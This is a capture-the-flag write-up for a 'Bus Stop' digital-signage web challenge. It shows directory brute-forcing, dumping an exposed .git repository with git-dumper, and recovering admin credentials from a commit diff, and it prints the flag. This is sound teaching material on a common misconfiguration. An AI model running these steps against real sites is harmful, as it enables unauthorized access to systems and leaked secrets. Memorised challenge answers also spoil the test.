Bus Stop (Smart City, 250p)

Your help is also needed for another task.
The previous developer for the bus stop digital signage servers has disappeared into thin air, but information still needs to be updated throughout the city.

You have been asked to help.
Find out if there is some vulnerability, backdoor, misconfiguration, etc. that would allow you to access the system.
Digital Signage Management Interface (http://envXXX.target03:8888/)
Flag will be given when correct login credentials are used.

---

solution

As the challenge is broken (PHP is not executed), flag is revealed straight away.

Intended way would be to find .git directory, dump it, read the source and log into the webpage.

# gobuster dir -u http://envXXX.target03:8888 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.1.0
===============================================================
/.git/HEAD            (Status: 200) [Size: 23]
/.htpasswd            (Status: 403) [Size: 282]
/.hta                 (Status: 403) [Size: 282]
/.htaccess            (Status: 403) [Size: 282]
/admin.php            (Status: 200) [Size: 134]
/assets               (Status: 301) [Size: 326] [--> http://envXXX.target03:8888/assets/]
/css                  (Status: 301) [Size: 323] [--> http://envXXX.target03:8888/css/]
/index.html           (Status: 200) [Size: 5104]
/js                   (Status: 301) [Size: 322] [--> http://envXXX.target03:8888/js/]
/server-status        (Status: 403) [Size: 282]

# git-dumper http://envXXX.target03:8888/ bus-stop
[-] Testing http://envXXX.target03:8888/.git/HEAD [200]
[-] Testing http://envXXX.target03:8888/.git/ [403]
[-] Fetching common files
[-] Fetching http://envXXX.target03:8888/.gitignore [404]
[-] http://envXXX.target03:8888/.gitignore responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/hooks/pre-push.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/pre-rebase.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/applypatch-msg.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/description [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/pre-receive.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/post-commit.sample [404]
[-] Fetching http://envXXX.target03:8888/.git/COMMIT_EDITMSG [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/post-update.sample [200]
[-] http://envXXX.target03:8888/.git/hooks/post-commit.sample responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/hooks/prepare-commit-msg.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/commit-msg.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/update.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/index [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/info/packs [404]
[-] http://envXXX.target03:8888/.git/objects/info/packs responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/info/exclude [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/pre-commit.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/pre-applypatch.sample [200]
[-] Fetching http://envXXX.target03:8888/.git/hooks/post-receive.sample [404]
[-] http://envXXX.target03:8888/.git/hooks/post-receive.sample responded with status code 404
[-] Finding refs/
[-] Fetching http://envXXX.target03:8888/.git/FETCH_HEAD [200]
[-] Fetching http://envXXX.target03:8888/.git/logs/refs/heads/master [200]
[-] Fetching http://envXXX.target03:8888/.git/HEAD [200]
[-] Fetching http://envXXX.target03:8888/.git/logs/refs/stash [404]
[-] http://envXXX.target03:8888/.git/logs/refs/stash responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/packed-refs [404]
[-] http://envXXX.target03:8888/.git/packed-refs responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/refs/heads/master [200]
[-] Fetching http://envXXX.target03:8888/.git/refs/remotes/origin/master [404]
[-] http://envXXX.target03:8888/.git/refs/remotes/origin/master responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/refs/stash [404]
[-] Fetching http://envXXX.target03:8888/.git/info/refs [404]
[-] Fetching http://envXXX.target03:8888/.git/refs/wip/wtree/refs/heads/master [404]
[-] Fetching http://envXXX.target03:8888/.git/logs/refs/remotes/origin/master [404]
[-] http://envXXX.target03:8888/.git/logs/refs/remotes/origin/master responded with status code 404
[-] http://envXXX.target03:8888/.git/refs/wip/wtree/refs/heads/master responded with status code 404
[-] http://envXXX.target03:8888/.git/info/refs responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/ORIG_HEAD [404]
[-] Fetching http://envXXX.target03:8888/.git/logs/refs/remotes/origin/HEAD [404]
[-] Fetching http://envXXX.target03:8888/.git/config [200]
[-] http://envXXX.target03:8888/.git/ORIG_HEAD responded with status code 404
[-] http://envXXX.target03:8888/.git/refs/stash responded with status code 404
[-] http://envXXX.target03:8888/.git/logs/refs/remotes/origin/HEAD responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/refs/wip/index/refs/heads/master [404]
[-] http://envXXX.target03:8888/.git/refs/wip/index/refs/heads/master responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/refs/remotes/origin/HEAD [404]
[-] http://envXXX.target03:8888/.git/refs/remotes/origin/HEAD responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/logs/HEAD [200]
[-] Finding packs
[-] Finding objects
[-] Fetching objects
[-] Fetching http://envXXX.target03:8888/.git/objects/42/e23a6abe443e47feaefe7c8e0cdde8851c97a6 [200]
[-] http://envXXX.target03:8888/.git/objects/00/00000000000000000000000000000000000000 responded with status code 404
[-] Fetching http://envXXX.target03:8888/.git/objects/00/00000000000000000000000000000000000000 [404]
[-] Fetching http://envXXX.target03:8888/.git/objects/73/efd808c535c1abc57f27b5f3f2d03ae0685d85 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/bf/a872e4b443bd5514f80d533406b9b900ee872d [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/99/271f43470046f87f451deaf265fe6c0c4ffecd [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/4e/17813c5360263197f8950b4c0d3d9426854c46 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/d0/3a62ac1167d0f2274fecc12cc5cc5df5b09416 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/57/85e5ce1e03383774acddfa8a6660412dc7c019 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/73/0e816400ad8ad66696d1f0d81e44a816c74a00 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/fc/12aacaf79a608d0a02e7d760889a3f87282823 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/76/010d7fa4db028dc71b20d3169a8ce68230f56e [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/c1/20b7ff23f8c7cfff4c5b20bc95a04f39d397fd [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/37/5d135a166feb9a2000454ed88a0c08ba127d41 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/63/1baf94d5bf36747d1722aa50ebb2b6cbef14fc [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/45/d063bf6002a17773628c926df39ba29c9ec3bf [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/8d/1c8b69c3fce7bea45c73efd06983e3c419a92f [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/5e/2e1e4049a6eed1218ac87e4d63dd49876393ec [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/b0/19eea446b07c39c98c18e7b3572ddd0ff5d248 [200]
[-] Fetching http://envXXX.target03:8888/.git/objects/03/bcdf54f33baa1367c07c71cc9de6c38d20647a [200]
[-] Running git checkout .

Check commits.

# cd bus-stop
~/bus-stop# git log
commit bfa872e4b443bd5514f80d533406b9b900ee872d (HEAD -> master)
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:24:40 2021 +0300

    cat.gif added

commit 730e816400ad8ad66696d1f0d81e44a816c74a00
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:24:05 2021 +0300

    index.php test credz removed

commit 42e23a6abe443e47feaefe7c8e0cdde8851c97a6
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:13:25 2021 +0300

    readme.md initial commit

commit 4e17813c5360263197f8950b4c0d3d9426854c46
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:10:54 2021 +0300

    index.php auth added

commit 76010d7fa4db028dc71b20d3169a8ce68230f56e
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:07:00 2021 +0300

    index.php menu added

commit c120b7ff23f8c7cfff4c5b20bc95a04f39d397fd
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:05:45 2021 +0300

    index.php initial commit

Interesting commit about credential removal.

# git show 730e816400ad8ad66696d1f0d81e44a816c74a00
commit 730e816400ad8ad66696d1f0d81e44a816c74a00
Author: Developer <Developer@company.com>
Date:   Mon Oct 4 15:24:05 2021 +0300

    index.php test credz removed

diff --git a/index.php b/index.php
index fc12aac..d03a62a 100644
--- a/index.php
+++ b/index.php
@@ -33,10 +33,6 @@
         <!-- Header-->
         <!-- <div class="b-example-divider"></div>-->

-        <!-- For TESTING only:
-        username: administrator
-        password: GGFkvo1piK -->
-
         <div class="modal modal-signin position-static d-block bg-secondary py-5" tabindex="-1" role="dialog" id="modalSignin">
         <div class="modal-dialog" role="document">
             <div class="modal-content rounded-5 shadow">

Rest of the intended way could not be tested as the challenge was broken.

Flag is ctf-tech{811d4c0e-33e7}.